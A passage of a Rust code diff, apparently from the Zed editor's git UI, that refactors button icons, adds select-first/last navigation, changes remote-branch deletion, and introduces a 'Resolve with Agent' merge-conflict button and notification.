- resolve_worktree_directory(repo_dir.path(), worktree_dir_setting),
- Some("HEAD".to_string()),
- )
+ // Create an initial commit (required for worktrees)
+ smol::fs::write(repo_dir.join("file.txt"), "content")
.await
.unwrap();
+ repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default()))
+ .await
+ .unwrap();
+ repo.commit(
+ "Initial commit".into(),
+ None,
+ CommitOptions::default(),
+ AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}),
+ Arc::new(checkpoint_author_envs()),
+ )
+ .await
+ .unwrap();
- // List worktrees — should have two
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 2);
-
- let expected_path =
- worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "test-branch");
- let new_worktree = worktrees
- .iter()
- .find(|w| w.branch() == "test-branch")
- .expect("should find worktree with test-branch");
- assert_eq!(
- new_worktree.path.canonicalize().unwrap(),
- expected_path.canonicalize().unwrap(),
- "failed for worktree_directory setting: {worktree_dir_setting:?}"
- );
+ // List worktrees — should have just the main one
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 1);
+ assert_eq!(
+ worktrees[0].path.canonicalize().unwrap(),
+ repo_dir.canonicalize().unwrap()
+ );
- // Clean up so the next iteration starts fresh
- repo.remove_worktree(expected_path, true).await.unwrap();
+ let worktree_path = worktrees_dir.join("some-worktree");
- // Clean up the worktree base directory if it was created outside repo_dir
- // (e.g. for the "../worktrees" setting, it won't be inside the TempDir)
- let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting);
- if !resolved_dir.starts_with(repo_dir.path()) {
- let _ = std::fs::remove_dir_all(&resolved_dir);
- }
- }
+ // Create a new worktree
+ repo.create_worktree(
+ "test-branch".to_string(),
+ worktree_path.clone(),
+ Some("HEAD".to_string()),
+ )
+ .await
+ .unwrap();
+
+ // List worktrees — should have two
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 2);
+
+ let new_worktree = worktrees
+ .iter()
+ .find(|w| w.display_name() == "test-branch")
+ .expect("should find worktree with test-branch");
+ assert_eq!(
+ new_worktree.path.canonicalize().unwrap(),
+ worktree_path.canonicalize().unwrap(),
+ );
}
#[gpui::test]
@@ -15,7 +15,7 @@ use gpui::{
px, uniform_list,
};
use language::line_diff;
-use menu::{Cancel, SelectNext, SelectPrevious};
+use menu::{Cancel, SelectFirst, SelectLast, SelectNext, SelectPrevious};
use project::{
Project,
git_store::{
@@ -1171,22 +1171,35 @@ impl GitGraph {
cx.notify();
}
- fn select_prev(&mut self, _: &SelectPrevious, _window: &mut Window, cx: &mut Context<Self>) {
+ fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context<Self>) {
+ self.select_entry(0, cx);
+ }
+
+ fn select_prev(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context<Self>) {
if let Some(selected_entry_idx) = &self.selected_entry_idx {
self.select_entry(selected_entry_idx.saturating_sub(1), cx);
} else {
- self.select_entry(0, cx);
+ self.select_first(&SelectFirst, window, cx);
}
}
fn select_next(&mut self, _: &SelectNext, window: &mut Window, cx: &mut Context<Self>) {
if let Some(selected_entry_idx) = &self.selected_entry_idx {
- self.select_entry(selected_entry_idx.saturating_add(1), cx);
+ self.select_entry(
+ selected_entry_idx
+ .saturating_add(1)
+ .min(self.graph_data.commits.len().saturating_sub(1)),
+ cx,
+ );
} else {
self.select_prev(&SelectPrevious, window, cx);
}
}
+ fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
+ self.select_entry(self.graph_data.commits.len().saturating_sub(1), cx);
+ }
+
fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context<Self>) {
self.open_selected_commit_view(window, cx);
}
@@ -1481,10 +1494,9 @@ impl GitGraph {
this.child(
Button::new("author-email-copy", author_email.clone())
- .icon(icon)
- .icon_size(IconSize::Small)
- .icon_color(icon_color)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(icon).size(IconSize::Small).color(icon_color),
+ )
.label_size(LabelSize::Small)
.truncate(true)
.color(Color::Muted)
@@ -1529,10 +1541,9 @@ impl GitGraph {
};
Button::new("sha-button", &full_sha)
- .icon(icon)
- .icon_size(IconSize::Small)
- .icon_color(icon_color)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(icon).size(IconSize::Small).color(icon_color),
+ )
.label_size(LabelSize::Small)
.truncate(true)
.color(Color::Muted)
@@ -1589,10 +1600,9 @@ impl GitGraph {
"view-on-provider",
format!("View on {}", provider_name),
)
- .icon(icon)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(icon).size(IconSize::Small).color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.truncate(true)
.color(Color::Muted)
@@ -2260,8 +2270,10 @@ impl Render for GitGraph {
this.open_selected_commit_view(window, cx);
}))
.on_action(cx.listener(Self::cancel))
+ .on_action(cx.listener(Self::select_first))
.on_action(cx.listener(Self::select_prev))
.on_action(cx.listener(Self::select_next))
+ .on_action(cx.listener(Self::select_last))
.on_action(cx.listener(Self::confirm))
.child(content)
.children(self.context_menu.as_ref().map(|(menu, position, _)| {
@@ -2346,7 +2358,7 @@ impl SerializableItem for GitGraph {
alive_items,
workspace_id,
"git_graphs",
- &persistence::GIT_GRAPHS,
+ &persistence::GitGraphsDb::global(cx),
cx,
)
}
@@ -2359,7 +2371,8 @@ impl SerializableItem for GitGraph {
window: &mut Window,
cx: &mut App,
) -> Task<gpui::Result<Entity<Self>>> {
- if persistence::GIT_GRAPHS
+ let db = persistence::GitGraphsDb::global(cx);
+ if db
.get_git_graph(item_id, workspace_id)
.ok()
.is_some_and(|is_open| is_open)
@@ -2380,11 +2393,12 @@ impl SerializableItem for GitGraph {
cx: &mut Context<Self>,
) -> Option<Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- persistence::GIT_GRAPHS
- .save_git_graph(item_id, workspace_id, true)
- .await
- }))
+ let db = persistence::GitGraphsDb::global(cx);
+ Some(
+ cx.background_spawn(
+ async move { db.save_git_graph(item_id, workspace_id, true).await },
+ ),
+ )
}
fn should_serialize(&self, event: &Self::Event) -> bool {
@@ -2418,7 +2432,7 @@ mod persistence {
)]);
}
- db::static_connection!(GIT_GRAPHS, GitGraphsDb, [WorkspaceDb]);
+ db::static_connection!(GitGraphsDb, [WorkspaceDb]);
impl GitGraphsDb {
query! {
@@ -26,6 +26,7 @@ collections.workspace = true
component.workspace = true
db.workspace = true
editor.workspace = true
+file_icons.workspace = true
futures.workspace = true
feature_flags.workspace = true
fuzzy.workspace = true
@@ -322,10 +322,11 @@ impl BlameRenderer for GitBlameRenderer {
format!("#{}", pr.number),
)
.color(Color::Muted)
- .icon(IconName::PullRequest)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::PullRequest)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
cx.stop_propagation();
cx.open_url(pr.url.as_str())
@@ -339,10 +340,11 @@ impl BlameRenderer for GitBlameRenderer {
short_commit_id.clone(),
)
.color(Color::Muted)
- .icon(IconName::FileGit)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::FileGit)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, window, cx| {
CommitView::open(
commit_summary.sha.clone().into(),
@@ -16,10 +16,7 @@ use project::project_settings::ProjectSettings;
use settings::Settings;
use std::sync::Arc;
use time::OffsetDateTime;
-use ui::{
- Divider, HighlightedLabel, KeyBinding, ListHeader, ListItem, ListItemSpacing, Tooltip,
- prelude::*,
-};
+use ui::{Divider, HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*};
use ui_input::ErasedEditor;
use util::ResultExt;
use workspace::notifications::DetachAndPromptErr;
@@ -486,28 +483,24 @@ impl BranchListDelegate {
let workspace = self.workspace.clone();
cx.spawn_in(window, async move |picker, cx| {
- let mut is_remote = false;
+ let is_remote;
let result = match &entry {
- Entry::Branch { branch, .. } => match branch.remote_name() {
- Some(remote_name) => {
- is_remote = true;
- repo.update(cx, |repo, _| repo.remove_remote(remote_name.to_string()))
- .await?
- }
- None => {
- repo.update(cx, |repo, _| repo.delete_branch(branch.name().to_string()))
- .await?
- }
- },
+ Entry::Branch { branch, .. } => {
+ is_remote = branch.is_remote();
+ repo.update(cx, |repo, _| {
+ repo.delete_branch(is_remote, branch.name().to_string())
+ })
+ .await?
+ }
_ => {
- log::error!("Failed to delete remote: wrong entry to delete");
+ log::error!("Failed to delete entry: wrong entry to delete");
return Ok(());
}
};
if let Err(e) = result {
if is_remote {
- log::error!("Failed to delete remote: {}", e);
+ log::error!("Failed to delete remote branch: {}", e);
} else {
log::error!("Failed to delete branch: {}", e);
}
@@ -517,7 +510,7 @@ impl BranchListDelegate {
if is_remote {
show_error_toast(
workspace,
- format!("remote remove {}", entry.name()),
+ format!("branch -dr {}", entry.name()),
e,
cx,
)
@@ -1088,21 +1081,6 @@ impl PickerDelegate for BranchListDelegate {
)
}
- fn render_header(
- &self,
- _window: &mut Window,
- _cx: &mut Context<Picker<Self>>,
- ) -> Option<AnyElement> {
- matches!(self.state, PickerState::List).then(|| {
- let label = match self.branch_filter {
- BranchFilter::All => "Branches",
- BranchFilter::Remote => "Remotes",
- };
-
- ListHeader::new(label).inset(true).into_any_element()
- })
- }
-
fn render_footer(&self, _: &mut Window, cx: &mut Context<Picker<Self>>) -> Option<AnyElement> {
if self.editor_position() == PickerEditorPosition::End {
return None;
@@ -1197,7 +1175,11 @@ impl PickerDelegate for BranchListDelegate {
this.justify_between()
.child({
let focus_handle = focus_handle.clone();
- Button::new("filter-remotes", "Filter Remotes")
+ let filter_label = match self.branch_filter {
+ BranchFilter::All => "Filter Remote",
+ BranchFilter::Remote => "Show All",
+ };
+ Button::new("filter-remotes", filter_label)
.toggle_state(matches!(
self.branch_filter,
BranchFilter::Remote
@@ -1513,6 +1495,30 @@ mod tests {
});
cx.run_until_parked();
+ let expected_branches = ["main", "feature-auth", "feature-ui", "develop"]
+ .into_iter()
+ .filter(|name| name != &branch_to_delete)
+ .collect::<HashSet<_>>();
+ let repo_branches = branch_list
+ .update(cx, |branch_list, cx| {
+ branch_list.picker.update(cx, |picker, cx| {
+ picker
+ .delegate
+ .repo
+ .as_ref()
+ .unwrap()
+ .update(cx, |repo, _cx| repo.branches())
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+ let repo_branches = repo_branches
+ .iter()
+ .map(|b| b.name())
+ .collect::<HashSet<_>>();
+ assert_eq!(&repo_branches, &expected_branches);
+
branch_list.update(cx, move |branch_list, cx| {
branch_list.picker.update(cx, move |picker, _cx| {
assert_eq!(picker.delegate.matches.len(), 3);
@@ -1522,19 +1528,13 @@ mod tests {
.iter()
.map(|be| be.name())
.collect::<HashSet<_>>();
- assert_eq!(
- branches,
- ["main", "feature-auth", "feature-ui", "develop"]
- .into_iter()
- .filter(|name| name != &branch_to_delete)
- .collect::<HashSet<_>>()
- );
+ assert_eq!(branches, expected_branches);
})
});
}
#[gpui::test]
- async fn test_delete_remote(cx: &mut TestAppContext) {
+ async fn test_delete_remote_branch(cx: &mut TestAppContext) {
init_test(cx);
let (_project, repository) = init_fake_repository(cx).await;
let branches = vec![
@@ -1544,19 +1544,17 @@ mod tests {
create_test_branch("develop", false, Some("private"), Some(700)),
];
- let remote_names = branches
+ let branch_names = branches
.iter()
- .filter_map(|branch| branch.remote_name().map(|r| r.to_string()))
+ .map(|branch| branch.name().to_string())
.collect::<Vec<String>>();
let repo = repository.clone();
cx.spawn(async move |mut cx| {
- for branch in remote_names {
- repo.update(&mut cx, |repo, _| {
- repo.create_remote(branch, String::from("test"))
- })
- .await
- .unwrap()
- .unwrap();
+ for branch in branch_names {
+ repo.update(&mut cx, |repo, _| repo.create_branch(branch, None))
+ .await
+ .unwrap()
+ .unwrap();
}
})
.await;
@@ -1583,6 +1581,35 @@ mod tests {
});
cx.run_until_parked();
+ let expected_branches = [
+ "origin/main",
+ "origin/feature-auth",
+ "fork/feature-ui",
+ "private/develop",
+ ]
+ .into_iter()
+ .filter(|name| name != &branch_to_delete)
+ .collect::<HashSet<_>>();
+ let repo_branches = branch_list
+ .update(cx, |branch_list, cx| {
+ branch_list.picker.update(cx, |picker, cx| {
+ picker
+ .delegate
+ .repo
+ .as_ref()
+ .unwrap()
+ .update(cx, |repo, _cx| repo.branches())
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+ let repo_branches = repo_branches
+ .iter()
+ .map(|b| b.name())
+ .collect::<HashSet<_>>();
+ assert_eq!(&repo_branches, &expected_branches);
+
// Check matches, it should match one less branch than before
branch_list.update(cx, move |branch_list, cx| {
branch_list.picker.update(cx, move |picker, _cx| {
@@ -1593,18 +1620,7 @@ mod tests {
.iter()
.map(|be| be.name())
.collect::<HashSet<_>>();
- assert_eq!(
- branches,
- [
- "origin/main",
- "origin/feature-auth",
- "fork/feature-ui",
- "private/develop"
- ]
- .into_iter()
- .filter(|name| name != &branch_to_delete)
- .collect::<HashSet<_>>()
- );
+ assert_eq!(branches, expected_branches);
})
});
}
@@ -366,11 +366,12 @@ impl CommitModal {
.unwrap_or_else(|| "<no branch>".to_owned());
let branch_picker_button = panel_button(branch)
- .icon(IconName::GitBranch)
- .icon_size(IconSize::Small)
- .icon_color(Color::Placeholder)
+ .start_icon(
+ Icon::new(IconName::GitBranch)
+ .size(IconSize::Small)
+ .color(Color::Placeholder),
+ )
.color(Color::Muted)
- .icon_position(IconPosition::Start)
.on_click(cx.listener(|_, _, window, cx| {
window.dispatch_action(zed_actions::git::Branch.boxed_clone(), cx);
}))
@@ -336,9 +336,10 @@ impl Render for CommitTooltip {
format!("#{}", pr.number),
)
.color(Color::Muted)
- .icon(IconName::PullRequest)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::PullRequest)
+ .color(Color::Muted),
+ )
.style(ButtonStyle::Subtle)
.on_click(move |_, _, cx| {
cx.stop_propagation();
@@ -354,9 +355,9 @@ impl Render for CommitTooltip {
)
.style(ButtonStyle::Subtle)
.color(Color::Muted)
- .icon(IconName::FileGit)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::FileGit).color(Color::Muted),
+ )
.on_click(
move |_, window, cx| {
CommitView::open(
@@ -524,10 +524,11 @@ impl CommitView {
.when(self.stash.is_none(), |this| {
this.child(
Button::new("sha", "Commit SHA")
- .icon(copy_icon)
- .icon_color(copy_icon_color)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(copy_icon)
+ .size(IconSize::Small)
+ .color(copy_icon_color),
+ )
.tooltip({
let commit_sha = commit_sha.clone();
move |_, cx| {
@@ -1,3 +1,4 @@
+use agent_settings::AgentSettings;
use collections::{HashMap, HashSet};
use editor::{
ConflictsOurs, ConflictsOursMarker, ConflictsOuter, ConflictsTheirs, ConflictsTheirsMarker,
@@ -5,14 +6,22 @@ use editor::{
display_map::{BlockContext, BlockPlacement, BlockProperties, BlockStyle, CustomBlockId},
};
use gpui::{
- App, Context, Entity, InteractiveElement as _, ParentElement as _, Subscription, Task,
- WeakEntity,
+ App, Context, DismissEvent, Entity, InteractiveElement as _, ParentElement as _, Subscription,
+ Task, WeakEntity,
};
use language::{Anchor, Buffer, BufferId};
-use project::{ConflictRegion, ConflictSet, ConflictSetUpdate, ProjectItem as _};
-use std::{ops::Range, sync::Arc};
-use ui::{ActiveTheme, Element as _, Styled, Window, prelude::*};
+use project::{
+ ConflictRegion, ConflictSet, ConflictSetUpdate, Project, ProjectItem as _,
+ git_store::{GitStoreEvent, RepositoryEvent},
+};
+use settings::Settings;
+use std::{cell::RefCell, ops::Range, rc::Rc, sync::Arc};
+use ui::{ActiveTheme, Divider, Element as _, Styled, Window, prelude::*};
use util::{ResultExt as _, debug_panic, maybe};
+use workspace::{Workspace, notifications::simple_message_notification::MessageNotification};
+use zed_actions::agent::{
+ ConflictContent, ResolveConflictedFilesWithAgent, ResolveConflictsWithAgent,
+};
pub(crate) struct ConflictAddon {
buffers: HashMap<BufferId, BufferConflicts>,
@@ -368,11 +377,12 @@ fn render_conflict_buttons(
editor: WeakEntity<Editor>,
cx: &mut BlockContext,
) -> AnyElement {
+ let is_ai_enabled = AgentSettings::get_global(cx).enabled(cx);
+
h_flex()
.id(cx.block_id)
.h(cx.line_height)
.ml(cx.margins.gutter.width)
- .items_end()
.gap_1()
.bg(cx.theme().colors().editor_background)
.child(
@@ -419,6 +429,7 @@ fn render_conflict_buttons(
Button::new("both", "Use Both")
.label_size(LabelSize::Small)
.on_click({
+ let editor = editor.clone();
let conflict = conflict.clone();
let ours = conflict.ours.clone();
let theirs = conflict.theirs.clone();
@@ -435,9 +446,147 @@ fn render_conflict_buttons(
}
}),
)
+ .when(is_ai_enabled, |this| {
+ this.child(Divider::vertical()).child(
+ Button::new("resolve-with-agent", "Resolve with Agent")
+ .label_size(LabelSize::Small)
+ .start_icon(
+ Icon::new(IconName::ZedAssistant)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
+ .on_click({
+ let conflict = conflict.clone();
+ move |_, window, cx| {
+ let content = editor
+ .update(cx, |editor, cx| {
+ let multibuffer = editor.buffer().read(cx);
+ let buffer_id = conflict.ours.end.buffer_id?;
+ let buffer = multibuffer.buffer(buffer_id)?;
+ let buffer_read = buffer.read(cx);
+ let snapshot = buffer_read.snapshot();
+ let conflict_text = snapshot
+ .text_for_range(conflict.range.clone())
+ .collect::<String>();
+ let file_path = buffer_read
+ .file()
+ .and_then(|file| file.as_local())
+ .map(|f| f.abs_path(cx).to_string_lossy().to_string())
+ .unwrap_or_default();
+ Some(ConflictContent {
+ file_path,
+ conflict_text,
+ ours_branch_name: conflict.ours_branch_name.to_string(),
+ theirs_branch_name: conflict.theirs_branch_name.to_string(),
+ })
+ })
+ .ok()
+ .flatten();
+ if let Some(content) = content {
+ window.dispatch_action(
+ Box::new(ResolveConflictsWithAgent {
+ conflicts: vec![content],
+ }),
+ cx,
+ );
+ }
+ }
+ }),
+ )
+ })
.into_any()
}
+fn collect_conflicted_file_paths(project: &Project, cx: &App) -> Vec<String> {
+ let git_store = project.git_store().read(cx);
+ let mut paths = Vec::new();
+
+ for repo in git_store.repositories().values() {
+ let snapshot = repo.read(cx).snapshot();
+ for (repo_path, _) in snapshot.merge.merge_heads_by_conflicted_path.iter() {
+ if let Some(project_path) = repo.read(cx).repo_path_to_project_path(repo_path, cx) {
+ paths.push(
+ project_path
+ .path
+ .as_std_path()
+ .to_string_lossy()
+ .to_string(),
+ );
+ }
+ }
+ }
+
+ paths
+}
+
+pub(crate) fn register_conflict_notification(
+ workspace: &mut Workspace,
+ cx: &mut Context<Workspace>,
+) {
+ let git_store = workspace.project().read(cx).git_store().clone();
+
+ let last_shown_paths: Rc<RefCell<HashSet<String>>> = Rc::new(RefCell::new(HashSet::default()));
+
+ cx.subscribe(&git_store, move |workspace, _git_store, event, cx| {
+ let conflicts_changed = matches!(
+ event,
+ GitStoreEvent::ConflictsUpdated
+ | GitStoreEvent::RepositoryUpdated(_, RepositoryEvent::StatusesChanged, _)
+ );
+ if !AgentSettings::get_global(cx).enabled(cx) || !conflicts_changed {
+ return;
+ }
+ let project = workspace.project().read(cx);
+ if project.is_via_collab() {
+ return;
+ }
+
+ if workspace.is_notification_suppressed(workspace::merge_conflict_notification_id()) {
+ return;
+ }
+
+ let paths = collect_conflicted_file_paths(project, cx);
+ let notification_id = workspace::merge_conflict_notification_id();
+ let current_paths_set: HashSet<String> = paths.iter().cloned().collect();
+
+ if paths.is_empty() {
+ last_shown_paths.borrow_mut().clear();
+ workspace.dismiss_notification(¬ification_id, cx);
+ } else if *last_shown_paths.borrow() != current_paths_set {
+ // Only show the notification if the set of conflicted paths has changed.
+ // This prevents re-showing after the user dismisses it while working on the same conflicts.
+ *last_shown_paths.borrow_mut() = current_paths_set;
+ let file_count = paths.len();
+ workspace.show_notification(notification_id, cx, |cx| {
+ cx.new(|cx| {
+ let message = format!(
+ "{file_count} file{} have unresolved merge conflicts",
+ if file_count == 1 { "" } else { "s" }
+ );
+
+ MessageNotification::new(message, cx)
+ .primary_message("Resolve with Agent")
+ .primary_icon(IconName::ZedAssistant)
+ .primary_icon_color(Color::Muted)
+ .primary_on_click({
+ let paths = paths.clone();
+ move |window, cx| {
+ window.dispatch_action(
+ Box::new(ResolveConflictedFilesWithAgent {
+ conflicted_file_paths: paths.clone(),
+ }),
+ cx,
+ );
+ cx.emit(DismissEvent);
+ }
+ })
+ })
+ });
+ }
+ })
+ .detach();
+}
+
pub(crate) fn resolve_conflict(
editor: WeakEntity<Editor>,
excerpt_id: ExcerptId,
@@ -6,9 +6,9 @@ use editor::{Editor, EditorEvent, MultiBuffer};
use futures::{FutureExt, select_biased};
use gpui::{
AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle,
- Focusable, IntoElement, Render, Task, WeakEntity, Window,
+ Focusable, Font, IntoElement, Render, Task, WeakEntity, Window,
};
-use language::{Buffer, LanguageRegistry};
+use language::{Buffer, HighlightedText, LanguageRegistry};
use project::Project;
use std::{
any::{Any, TypeId},
@@ -21,7 +21,7 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString};
use util::paths::PathExt as _;
use workspace::{
Item, ItemHandle as _, ItemNavHistory, ToolbarItemLocation, Workspace,
- item::{BreadcrumbText, ItemEvent, SaveOptions, TabContentParams},
+ item::{ItemEvent, SaveOptions, TabContentParams},
searchable::SearchableItemHandle,
};
@@ -108,7 +108,7 @@ impl FileDiffView {
for buffer in [&old_buffer, &new_buffer] {
cx.subscribe(buffer, move |this, _, event, _| match event {
- language::BufferEvent::Edited
+ language::BufferEvent::Edited { .. }
| language::BufferEvent::LanguageChanged(_)
| language::BufferEvent::Reparsed => {
this.buffer_changes_tx.send(()).ok();
@@ -324,7 +324,7 @@ impl Item for FileDiffView {
ToolbarItemLocation::PrimaryLeft
}
- fn breadcrumbs(&self, cx: &App) -> Option<Vec<BreadcrumbText>> {
+ fn breadcrumbs(&self, cx: &App) -> Option<(Vec<HighlightedText>, Option<Font>)> {
self.editor.breadcrumbs(cx)
}
@@ -429,10 +429,11 @@ impl Render for FileHistoryView {
Button::new("load-more", "Load More")
.disabled(self.loading_more)
.label_size(LabelSize::Small)
- .icon(IconName::ArrowCircle)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::ArrowCircle)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(cx.listener(|this, _, window, cx| {
this.load_more(window, cx);
})),
@@ -565,7 +566,10 @@ impl Item for FileHistoryView {
false
}
- fn breadcrumbs(&self, _cx: &App) -> Option<Vec<workspace::item::BreadcrumbText>> {
+ fn breadcrumbs(
+ &self,
+ _cx: &App,
+ ) -> Option<(Vec<workspace::item::HighlightedText>, Option<gpui::Font>)> {
None
}
@@ -14,12 +14,13 @@ use anyhow::Context as _;
use askpass::AskPassDelegate;
use cloud_llm_client::CompletionIntent;
use collections::{BTreeMap, HashMap, HashSet};
-use db::kvp::KEY_VALUE_STORE;
+use db::kvp::KeyValueStore;
use editor::{
Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset,
actions::ExpandAllDiffHunks,
};
use editor::{EditorStyle, RewrapOptions};
+use file_icons::FileIcons;
use futures::StreamExt as _;
use git::commit::ParsedCommitMessage;
use git::repository::{
@@ -714,11 +715,16 @@ impl GitPanel {
let mut was_sort_by_path = GitPanelSettings::get_global(cx).sort_by_path;
let mut was_tree_view = GitPanelSettings::get_global(cx).tree_view;
+ let mut was_file_icons = GitPanelSettings::get_global(cx).file_icons;
+ let mut was_folder_icons = GitPanelSettings::get_global(cx).folder_icons;
let mut was_diff_stats = GitPanelSettings::get_global(cx).diff_stats;
cx.observe_global_in::<SettingsStore>(window, move |this, window, cx| {
- let sort_by_path = GitPanelSettings::get_global(cx).sort_by_path;
- let tree_view = GitPanelSettings::get_global(cx).tree_view;
- let diff_stats = GitPanelSettings::get_global(cx).diff_stats;
+ let settings = GitPanelSettings::get_global(cx);
+ let sort_by_path = settings.sort_by_path;
+ let tree_view = settings.tree_view;
+ let file_icons = settings.file_icons;
+ let folder_icons = settings.folder_icons;
+ let diff_stats = settings.diff_stats;
if tree_view != was_tree_view {
this.view_mode = GitPanelViewMode::from_settings(cx);
}
@@ -731,12 +737,22 @@ impl GitPanel {
if (diff_stats != was_diff_stats) || update_entries {
this.update_visible_entries(window, cx);
}
+ if file_icons != was_file_icons || folder_icons != was_folder_icons {
+ cx.notify();
+ }
was_sort_by_path = sort_by_path;
was_tree_view = tree_view;
+ was_file_icons = file_icons;
+ was_folder_icons = folder_icons;
was_diff_stats = diff_stats;
})
.detach();
+ cx.observe_global::<FileIcons>(|_, cx| {
+ cx.notify();
+ })
+ .detach();
+
// just to let us render a placeholder editor.
// Once the active git repo is set, this buffer will be replaced.
let temporary_buffer = cx.new(|cx| Buffer::local("", cx));
@@ -912,6 +928,7 @@ impl GitPanel {
let width = self.width;
let amend_pending = self.amend_pending;
let signoff_enabled = self.signoff_enabled;
+ let kvp = KeyValueStore::global(cx);
self.pending_serialization = cx.spawn(async move |git_panel, cx| {
cx.background_executor()
@@ -932,16 +949,15 @@ impl GitPanel {
};
cx.background_spawn(
async move {
- KEY_VALUE_STORE
- .write_kvp(
- serialization_key,
- serde_json::to_string(&SerializedGitPanel {
- width,
- amend_pending,
- signoff_enabled,
- })?,
- )
- .await?;
+ kvp.write_kvp(
+ serialization_key,
+ serde_json::to_string(&SerializedGitPanel {
+ width,
+ amend_pending,
+ signoff_enabled,
+ })?,
+ )
+ .await?;
anyhow::Ok(())
}
.log_err(),
@@ -1117,7 +1133,22 @@ impl GitPanel {
}
if matches!(self.entries.get(new_index), Some(GitListEntry::Header(..))) {
- self.selected_entry = Some(new_index.saturating_sub(1));
+ self.selected_entry = match &self.view_mode {
+ GitPanelViewMode::Flat => Some(new_index.saturating_sub(1)),
+ GitPanelViewMode::Tree(tree_view_state) => {
+ maybe!({
+ let current_logical_index = tree_view_state
+ .logical_indices
+ .iter()
+ .position(|&i| i == new_index)?;
+
+ tree_view_state
+ .logical_indices
+ .get(current_logical_index.saturating_sub(1))
+ .copied()
+ })
+ }
+ };
} else {
self.selected_entry = Some(new_index);
}
@@ -2245,6 +2276,7 @@ impl GitPanel {
RewrapOptions {
override_language_settings: false,
preserve_existing_whitespace: true,
+ line_length: None,
},
cx,
);
@@ -5020,15 +5052,21 @@ impl GitPanel {
window: &Window,
cx: &Context<Self>,
) -> AnyElement {
- let tree_view = GitPanelSettings::get_global(cx).tree_view;
+ let settings = GitPanelSettings::get_global(cx);
+ let tree_view = settings.tree_view;
let path_style = self.project.read(cx).path_style(cx);
let git_path_style = ProjectSettings::get_global(cx).git.path_style;
let display_name = entry.display_name(path_style);
let selected = self.selected_entry == Some(ix);
let marked = self.marked_entries.contains(&ix);
- let status_style = GitPanelSettings::get_global(cx).status_style;
+ let status_style = settings.status_style;
let status = entry.status;
+ let file_icon = if settings.file_icons {
+ FileIcons::get_icon(entry.repo_path.as_std_path(), cx)
+ } else {
+ None
+ };
let has_conflict = status.is_conflicted();
let is_modified = status.is_modified();
@@ -5105,6 +5143,21 @@ impl GitPanel {
.min_w_0()
.flex_1()
.gap_1()
+ .when(settings.file_icons, |this| {
+ this.child(
+ file_icon
+ .map(|file_icon| {
+ Icon::from_path(file_icon)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ })
+ .unwrap_or_else(|| {
+ Icon::new(IconName::File)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ }),
+ )
+ })
.child(git_status_icon(status))
.map(|this| {
if tree_view {
@@ -5273,10 +5326,24 @@ impl GitPanel {
)
};
- let folder_icon = if entry.expanded {
- IconName::FolderOpen
+ let settings = GitPanelSettings::get_global(cx);
+ let folder_icon = if settings.folder_icons {
+ FileIcons::get_folder_icon(entry.expanded, entry.key.path.as_std_path(), cx)
+ } else {
+ FileIcons::get_chevron_icon(entry.expanded, cx)
+ };
+ let fallback_folder_icon = if settings.folder_icons {
+ if entry.expanded {
+ IconName::FolderOpen
+ } else {
+ IconName::Folder
+ }
} else {
- IconName::Folder
+ if entry.expanded {
+ IconName::ChevronDown
+ } else {
+ IconName::ChevronRight
+ }
};
let stage_status = if let Some(repo) = &self.active_repository {
@@ -5299,9 +5366,17 @@ impl GitPanel {
.gap_1()
.pl(px(entry.depth as f32 * TREE_INDENT))
.child(
- Icon::new(folder_icon)
- .size(IconSize::Small)
- .color(Color::Muted),
+ folder_icon
+ .map(|folder_icon| {
+ Icon::from_path(folder_icon)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ })
+ .unwrap_or_else(|| {
+ Icon::new(fallback_folder_icon)
+ .size(IconSize::Small)
+ .color(Color::Muted)
+ }),
)
.child(self.entry_label(entry.name.clone(), label_color).truncate());
@@ -5468,12 +5543,14 @@ impl GitPanel {
mut cx: AsyncWindowContext,
) -> anyhow::Result<Entity<Self>> {
let serialized_panel = match workspace
- .read_with(&cx, |workspace, _| Self::serialization_key(workspace))
+ .read_with(&cx, |workspace, cx| {
+ Self::serialization_key(workspace).map(|key| (key, KeyValueStore::global(cx)))
+ })
.ok()
